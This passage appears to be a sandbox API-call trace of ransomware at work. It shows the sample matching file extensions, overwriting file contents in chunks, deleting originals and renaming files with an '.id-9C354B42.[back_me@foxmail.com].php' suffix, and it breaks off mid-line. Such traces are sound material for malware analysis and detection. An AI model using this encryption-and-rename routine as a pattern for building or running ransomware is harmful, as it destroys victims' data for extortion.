[0047.690] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.690] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.690] ReadFile (in: hFile=0x1f4, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.705] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.705] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0047.722] SetEndOfFile (hFile=0x1f4) returned 1 [0047.722] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42638d8 [0047.775] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.775] WriteFile (in: hFile=0x1f4, lpBuffer=0x42638d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42638d8*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.843] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.844] WriteFile (in: hFile=0x1f4, lpBuffer=0x42638d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42638d8*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.846] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.846] WriteFile (in: hFile=0x1f4, lpBuffer=0x42638d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42638d8*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.848] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42638d8 | out: hHeap=0xb10000) returned 1 [0047.849] CloseHandle (hObject=0x1f4) returned 1 [0047.849] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.849] lstrlenW (lpString=".doc") returned 4 [0047.849] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.849] lstrlenW (lpString=".docx") returned 5 [0047.849] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.849] lstrlenW (lpString=".pdf") returned 4 [0047.849] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.849] lstrlenW (lpString=".xls") returned 4 [0047.850] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString=".xlsx") returned 5 [0047.850] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.850] lstrlenW (lpString=".ppt") returned 4 [0047.850] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.850] lstrlenW (lpString=".zip") returned 4 [0047.850] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString=".rar") returned 4 [0047.850] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString=".bz2") returned 4 [0047.850] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.850] lstrlenW (lpString=".7z") returned 3 [0047.850] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.850] lstrlenW (lpString=".dbf") returned 4 [0047.850] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.850] lstrlenW (lpString=".1cd") returned 4 [0047.850] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.850] lstrlenW (lpString=".jpg") returned 4 [0047.850] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.850] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.850] lstrlenW (lpString=".doc") returned 4 [0047.850] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString=".docx") returned 5 [0047.850] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.850] lstrlenW (lpString=".pdf") returned 4 [0047.850] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.850] lstrlenW (lpString=".xls") returned 4 [0047.850] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.851] lstrlenW (lpString=".xlsx") returned 5 [0047.851] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.851] lstrlenW (lpString=".ppt") returned 4 [0047.851] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.851] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.851] lstrlenW (lpString=".zip") returned 4 [0047.851] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.851] lstrlenW (lpString=".rar") returned 4 [0047.851] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.851] lstrlenW (lpString=".bz2") returned 4 [0047.851] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.851] lstrlenW (lpString=".7z") returned 3 [0047.851] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.851] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.851] lstrlenW (lpString=".dbf") returned 4 [0047.851] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.851] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.851] lstrlenW (lpString=".1cd") returned 4 [0047.851] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.851] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0047.851] lstrlenW (lpString=".jpg") returned 4 [0047.851] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.851] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0047.851] lstrlenW (lpString="ose.exe") returned 7 [0047.851] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.852] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=174440) returned 1 [0047.852] CloseHandle (hObject=0x1f4) returned 1 [0047.852] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0047.852] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.852] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.852] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.852] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.852] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0047.852] GetLastError () returned 0x0 [0047.852] ReadFile (in: hFile=0x1f4, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0047.857] WriteFile (in: hFile=0x1f8, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0047.860] ReadFile (in: hFile=0x1f4, lpBuffer=0x3fb0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x366fed4, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesRead=0x366fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.860] WriteFile (in: hFile=0x1f8, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x366fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0047.860] SetEndOfFile (hFile=0x1f8) returned 1 [0047.861] CloseHandle (hObject=0x1f8) returned 1 [0047.861] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.861] SetEndOfFile (hFile=0x1f4) returned 1 [0047.863] CloseHandle (hObject=0x1f4) returned 1 [0047.863] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.863] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0047.863] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.863] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.863] lstrlenW (lpString=".doc") returned 4 [0047.863] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.863] lstrlenW (lpString=".docx") returned 5 [0047.863] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0047.863] lstrlenW (lpString=".pdf") returned 4 [0047.863] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.863] lstrlenW (lpString=".xls") returned 4 [0047.863] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.863] lstrlenW (lpString=".xlsx") returned 5 [0047.863] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0047.864] lstrlenW (lpString=".ppt") returned 4 [0047.864] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.864] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.864] lstrlenW (lpString=".zip") returned 4 [0047.864] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.864] lstrlenW (lpString=".rar") returned 4 [0047.864] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.864] lstrlenW (lpString=".bz2") returned 4 [0047.864] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.864] lstrlenW (lpString=".7z") returned 3 [0047.864] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.864] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.864] lstrlenW (lpString=".dbf") returned 4 [0047.864] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.864] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.864] lstrlenW (lpString=".1cd") returned 4 [0047.864] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.864] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.864] lstrlenW (lpString=".jpg") returned 4 [0047.864] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.864] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.864] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.864] lstrlenW (lpString=".doc") returned 4 [0047.864] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.864] lstrlenW (lpString=".docx") returned 5 [0047.864] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0047.864] lstrlenW (lpString=".pdf") returned 4 [0047.864] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.864] lstrlenW (lpString=".xls") returned 4 [0047.864] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.864] lstrlenW (lpString=".xlsx") returned 5 [0047.864] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0047.864] lstrlenW (lpString=".ppt") returned 4 [0047.865] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.865] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.865] lstrlenW (lpString=".zip") returned 4 [0047.865] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.865] lstrlenW (lpString=".rar") returned 4 [0047.865] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.865] lstrlenW (lpString=".bz2") returned 4 [0047.865] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.865] lstrlenW (lpString=".7z") returned 3 [0047.865] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.865] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.865] lstrlenW (lpString=".dbf") returned 4 [0047.865] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.865] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.865] lstrlenW (lpString=".1cd") returned 4 [0047.865] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.865] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.865] lstrlenW (lpString=".jpg") returned 4 [0047.865] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.865] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0047.865] lstrlenW (lpString="osetup.dll") returned 10 [0047.865] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.866] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x366ff1c | out: lpFileSize=0x366ff1c*=7378792) returned 1 [0047.866] CloseHandle (hObject=0x1f4) returned 1 [0047.866] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0047.866] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.866] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0047.867] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.867] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.867] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.867] ReadFile (in: hFile=0x1f4, lpBuffer=0x3fb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3fb0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.896] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.896] ReadFile (in: hFile=0x1f4, lpBuffer=0x3ff0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ff0058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.052] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x366fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.052] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x366fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.052] ReadFile (in: hFile=0x1f4, lpBuffer=0x4030058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x366fc38, lpOverlapped=0x0 | out: lpBuffer=0x4030058*, lpNumberOfBytesRead=0x366fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.079] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.079] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fb0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x366fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3fb0020*, lpNumberOfBytesWritten=0x366fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0048.094] SetEndOfFile (hFile=0x1f4) returned 1 [0048.094] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42638d8 [0048.379] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.379] WriteFile (in: hFile=0x1f4, lpBuffer=0x42638d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42638d8*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.382] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.382] WriteFile (in: hFile=0x1f4, lpBuffer=0x42638d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42638d8*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.384] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x366fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.384] WriteFile (in: hFile=0x1f4, lpBuffer=0x42638d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x366fc88, lpOverlapped=0x0 | out: lpBuffer=0x42638d8*, lpNumberOfBytesWritten=0x366fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.385] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42638d8 | out: hHeap=0xb10000) returned 1 [0048.643] CloseHandle (hObject=0x1f4) returned 1 [0048.643] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.643] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.643] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.643] lstrlenW (lpString=".doc") returned 4 [0048.643] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.643] lstrlenW (lpString=".docx") returned 5 [0048.644] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0048.644] lstrlenW (lpString=".pdf") returned 4 [0048.644] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.644] lstrlenW (lpString=".xls") returned 4 [0048.644] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.644] lstrlenW (lpString=".xlsx") returned 5 [0048.644] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0048.644] lstrlenW (lpString=".ppt") returned 4 [0048.644] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.644] lstrlenW (lpString=".zip") returned 4 [0048.644] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.644] lstrlenW (lpString=".rar") returned 4 [0048.644] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.644] lstrlenW (lpString=".bz2") returned 4 [0048.644] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.644] lstrlenW (lpString=".7z") returned 3 [0048.644] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.644] lstrlenW (lpString=".dbf") returned 4 [0048.644] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.644] lstrlenW (lpString=".1cd") returned 4 [0048.644] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.644] lstrlenW (lpString=".jpg") returned 4 [0048.644] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.644] lstrlenW (lpString=".doc") returned 4 [0048.644] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.644] lstrlenW (lpString=".docx") returned 5 [0048.644] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0048.644] lstrlenW (lpString=".pdf") returned 4 [0048.644] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.645] lstrlenW (lpString=".xls") returned 4 [0048.645] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.645] lstrlenW (lpString=".xlsx") returned 5 [0048.645] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0048.645] lstrlenW (lpString=".ppt") returned 4 [0048.645] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.645] lstrlenW (lpString=".zip") returned 4 [0048.645] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.645] lstrlenW (lpString=".rar") returned 4 [0048.645] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.645] lstrlenW (lpString=".bz2") returned 4 [0048.645] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.645] lstrlenW (lpString=".7z") returned 3 [0048.645] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0048.645] lstrlenW 